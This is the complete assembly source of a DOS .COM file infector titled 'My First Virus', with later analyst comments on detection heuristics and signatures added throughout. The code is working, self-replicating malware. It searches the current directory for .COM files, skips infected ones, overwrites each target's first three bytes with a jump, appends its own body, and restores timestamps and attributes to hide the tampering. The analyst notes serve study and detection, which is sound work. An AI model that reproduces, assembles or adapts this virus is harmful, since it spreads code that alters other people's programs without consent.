;******************************************************************
;* *
;* My First Virus, a simple non-overwriting COM infector *
;* *
;* by, Solomon *
;* *
;******************************************************************
; Assembler setup: MASM/TASM-style directives, tiny model, single segment,
; origin 100h as used for a DOS .COM image.
.model tiny ; Memory model
.code ; Start Code
org 100h ; Start of COM file
; Analyst note: these three bytes occupy the slot where a host program's
; first instruction would be. 0E9h is a near JMP; with a 0000h displacement
; it lands on START_VIRUS, which follows immediately.
MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS
; START_VIRUS: entry point of the appended body.
; Steps in this part: work out the load displacement, copy the three saved
; host bytes back to 100h, then point DOS at a private DTA.
; Registers: BP = displacement added to every [bp+LABEL] reference that
;            follows; DI = 100h (also pushed, see below).
START_VIRUS proc near ; Real start of Virus
call FIND_OFFSET
; Calculate change in offset from host program.
; Analyst note: a CALL to the very next instruction followed by a POP is how
; the code reads its own address at run time. When triaging a sample, this
; call/pop pair at a jump target near the end of a .COM file is a useful sign
; of appended, self-relocating code.
FIND_OFFSET: pop bp ; BP holds current IP
sub bp, offset FIND_OFFSET ; Calculate net change
; Change BP to start of
; virus code
; Restore original bytes to the infected program.
lea si,[bp+ORIG_START] ; Source: the 3 saved host bytes
mov di,100h ; Destination: 100h, start of file
push di ; Keep 100h on the stack; the RETN at QUIT returns to it
movsw ; Copy bytes 1-2
movsb ; Copy byte 3
; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy
; original command line parameters.
lea dx,[bp+NEW_DTA] ; Point to new DTA area
call SET_DTA ; Go change it
; DOS Findfirst / Findnext services
; Loop shape: FINDFIRST loads AH=4Eh once; later passes jump to FINDNEXT with
; AH=4Fh already set, so both share the single INT 21h below.
; Scope visible in this file: the mask '*.com' carries no path, so the search
; covers the current directory only, and CX=0 limits it to files with normal
; attributes.
FINDFIRST: mov ah,4eh ; DOS find first service
lea dx,[bp+COM_MASK] ; Search for any COM file
xor cx,cx ; Attribute mask
FINDNEXT: int 21h ; Call DOS to do it
jc QUIT ; Quit if there are errors
; or no more files
; A candidate file was found. Open it read-only and check whether it
; already carries this code.
mov ax,3d00h ; DOS Open file, read only
lea dx,[bp+NEW_DTA+30] ; Point to filename we found
int 21h ; Call DOS to do it
xchg ax,bx ; Put file handle in BX
; Check for a previous infection. Nothing is read from the end of the file:
; the test compares the file size reported in the DTA with the size implied
; by the word at file offset 1 (read as a jump displacement).
; Analyst note: the same relation works as a detection heuristic for this
; sample: word at offset 1 + (END_VIRUS-START_VIRUS) + 3 == file size.
mov ah,3fh ; DOS Read file
lea dx,[bp+ORIG_START] ; Save the original header
mov cx,3 ; Read 3 bytes
int 21h ; Call DOS to do it
mov ax,word ptr [bp+NEW_DTA+26] ; Put file size (low word, from DTA) in AX
mov cx,word ptr [bp+ORIG_START+1] ; Jmp offset
add cx,END_VIRUS-START_VIRUS+3; Convert to filesize
cmp ax,cx ; Compare file sizes
jnz INFECT_COM ; If healthy, go infect it
mov ah,3eh ; Otherwise close file and
int 21h ; try to find another victim
mov ah,4fh ; DOS find next file
jmp short FINDNEXT ; Find another file
; Restore default DTA and pass control back to original program.
; Call any activation routines here.
; Analyst note: no activation routine is present in this listing; the only
; actions are the DTA reset and the return to the host.
QUIT: mov dx,80h ; Restore original DTA
call SET_DTA ; Go change it
retn ; Return to 100h: the value pushed from DI in
; START_VIRUS is on top of the stack, so the
; restored host program runs next.
;*** Subroutine INFECT_COM ***
; Reached by JNZ from the infection check, not by CALL; it ends with JMP QUIT,
; so at most one file is modified per run.
; In: BX = handle of the candidate file (opened read-only), DTA at NEW_DTA
;     filled by Findfirst/Findnext.
; Analyst note, observable changes to the target file: its first three bytes
; are replaced with a near JMP, and its length grows by END_VIRUS-START_VIRUS
; bytes. Date, time and attributes are put back afterwards, so those fields
; are not reliable evidence of tampering; size and content baselines are.
INFECT_COM:
; Reset the file attributes to normal so I can write to the file
mov ax,4301h ; DOS change file attr
xor cx,cx ; Zero attributes
lea dx,[bp+NEW_DTA+30] ; Point to filename in DTA
int 21h ; Call DOS to do it
; Calculate jump offset for header of victim so it will run virus first.
mov ax,word ptr [bp+NEW_DTA+26] ; Put filesize in AX
sub ax,3 ; Subtract 3, size-jmp_code
mov word ptr [bp+JMP_OFFSET],ax ; Store new offset
; Close the file and reopen it for read/write. BX still holds file handle.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
mov ax,3d02h ; DOS open file, read/write (DX still points to the filename)
int 21h ; Call DOS to do it
xchg ax,bx ; Put file handle in BX
; Write the new header at the beginning of the file.
; HEADER is a single 0E9h byte; JMP_OFFSET is declared directly after it in
; the source, so the 3-byte write covers the opcode plus the displacement
; stored above.
mov ah,40h ; DOS write to file
mov cx,3 ; Write 3 bytes
lea dx,[bp+HEADER] ; Point to the 3 bytes to write
int 21h ; Call DOS to do it
; Move to end of file so I can append the virus to it.
mov al,2 ; Select end of file
call FILE_PTR ; Go to end of file
; Append the virus to the end of the file.
; The length stops at END_VIRUS, so the scratch area (JMP_OFFSET, NEW_DTA)
; is not part of what gets written.
mov ah,40h ; DOS write to file
mov cx,END_VIRUS-START_VIRUS ; Length of virus
lea dx,[bp+START_VIRUS] ; Start from beginning of virus
int 21h ; Call DOS to do it
; Restore the file's original timestamp and datestamp. These values were
; stored in the DTA by the Findfirst / Findnext services.
mov ax,5701h ; DOS set file date & time
mov cx,word ptr [bp+NEW_DTA+22] ; Set time
mov dx,word ptr [bp+NEW_DTA+24] ; Set date
int 21h ; Call DOS to do it
; Restore original file attributes.
mov ax,4301h ; DOS change file attr
mov cx,word ptr [bp+NEW_DTA+21] ; Get original file attr
lea dx,[bp+NEW_DTA+30] ; Point to file name
int 21h ; Call DOS
; Lastly, close the file and go back to main program.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
jmp QUIT ; We're done
;*** Subroutine SET_DTA ***
; Points DOS at a new Disk Transfer Area via INT 21h function 1Ah.
; In:    DX = offset of the new DTA (callers pass bp+NEW_DTA or 80h)
; Clobb: AH
SET_DTA proc near
mov ah,1ah ; DOS set DTA
int 21h ; Call DOS to do it
retn ; Return
SET_DTA endp
;*** Subroutine FILE_PTR ***
; Moves the file pointer with INT 21h function 42h, using a zero offset.
; In:    AL = seek origin (the one caller in this file passes 2, end of file)
;        BX = file handle
; Clobb: AH, CX, DX, plus whatever INT 21h returns in AX/DX
FILE_PTR proc near
mov ah,42h ; DOS set read/write pointer
xor cx,cx ; Set offset move to zero
cwd ; Sign-extends AX into DX; AH=42h keeps AX positive, so DX = 0
int 21h ; Call DOS to do it
retn ; Return
FILE_PTR endp
; This area will hold all variables to be encrypted
; Analyst note: no encryption routine appears in this listing, so these bytes
; are stored in the clear. The '*.com' string and the bytes around it are
; therefore stable material for a static signature of this sample.
COM_MASK db '*.com',0 ; COM file mask
; Saved first three bytes of the host. The initial value 0CDh,20h is INT 20h
; (program terminate), which is what runs at 100h when this source is
; assembled and executed on its own.
ORIG_START db 0cdh,20h,0 ; Saved host header (3 bytes)
HEADER db 0e9h ; Jmp command for new header
START_VIRUS endp
END_VIRUS equ $ ; Mark end of virus code
; This data area is a scratch area and is not included in virus code.
; JMP_OFFSET must stay directly after HEADER: the header write in INFECT_COM
; sends 3 bytes starting at HEADER.
JMP_OFFSET dw ? ; Jump offset for new header
; DTA fields read by the code: +21 attribute, +22 time, +24 date,
; +26 file size, +30 file name.
NEW_DTA db 43 dup(?) ; New DTA location
end MAIN